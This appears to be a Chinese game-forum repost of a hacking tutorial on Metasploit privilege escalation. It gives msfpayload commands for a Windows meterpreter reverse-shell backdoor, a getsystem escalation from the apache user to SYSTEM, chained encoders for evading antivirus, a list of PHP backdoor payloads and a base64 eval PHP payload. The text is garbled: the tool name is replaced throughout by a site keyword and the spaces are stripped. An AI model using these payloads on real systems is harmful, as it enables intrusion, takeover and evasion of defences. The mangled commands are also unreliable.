设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
精品版本
›
微端版本
›
使用Metasploit进行权限提升
返回列表
发新帖
使用Metasploit进行权限提升
[复制链接]
322
|
0
|
2012-4-1 19:21:41
|
显示全部楼层
|
阅读模式
首先我虚拟机的APACHE是以非系统权限启动的
我们来生成一个Door
root@Dis9Team:~$sudom单机传奇payloadwindows/meterpreter/reverse_tcpLHOST=192.168.1.1LPORT=4444x>/var/www/door.exe
[sudo]passwordforbrk:
Createdbym单机传奇payload(http://www.metasploit.com).
Payload:windows/meterpreter/reverse_tcp
Length:290
Options:{"LHOST"=>"192.168.1.1","LPORT"=>"4444"}
然后上传到WEBSHELL服务器运行,metasploit本地监听
看终端成功去定了SHELL
你可以用强大的meterpreter会话帮你权限提升,他会自动运行从古到今的本地EXP360的也有哦:
meterpreter>getuid
Serverusername:DIS9TEAM-5FA711apache==>不是系统权限
meterpreter>getsystem==>运行一个命令
...gotsystem(viatechnique4).
meterpreter>getuid
Serverusername:NTAUTHORITYSYSTEM==>传说种的溢出
meterpreter>
如果安全了杀毒软件你也可以BYPASS
m单机传奇payloadwindows/meterpreter/reverse_tcpLHOST=127.0.0.1LPORT=21R|./m单机传奇encode-ex86/call4_dword_xor-traw-c5|./m单机传奇encode-ex86/countdown-traw-c5|./m单机传奇encode-ex86/fnstenv_mov-traw-c5|./m单机传奇encode-ex86/jmp_call_additive-traw-c5|./m单机传奇encode-texe-c5>/tmp/5x.exe
如果你嫌弃EXE露点你也可以生成脚本后门:
root@Dis9Team:/tmp/#m单机传奇payload-l|grepphp
php/bind_perlListenforaconnectionandspawnacommandshellviaperl(persistent)
php/bind_perl_ipv6Listenforaconnectionandspawnacommandshellviaperl(persistent)overIPv6
php/bind_phpListenforaconnectionandspawnacommandshellviaphp
php/bind_php_ipv6Listenforaconnectionandspawnacommandshellviaphp(IPv6)
php/download_execDownloadanEXEfromanHTTPURLandexecuteit
php/execExecuteasinglesystemcommand
php/meterpreter/bind_tcpListenforaconnection,RunameterpreterserverinPHP
php/meterpreter/reverse_tcpReversePHPconnectbackstagerwithcheck单机传奇ordisabledfunctions,RunameterpreterserverinPHP
php/meterpreter_reverse_tcpConnectbacktoattackerandspawnaMeterpreterserver(PHP)
php/reverse_perlCreatesaninteractiveshellviaperl
php/reverse_phpReversePHPconnectbackshellwithcheck单机传奇ordisabledfunctions
php/shell_findsock
m单机传奇payload(bind_php)>generate-traw-ephp/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIGSNIP-->
原文 http://www.dis9.com/metasploit-privilege-escalation.html
*
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
飞尔
回复楼主
返回列表
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡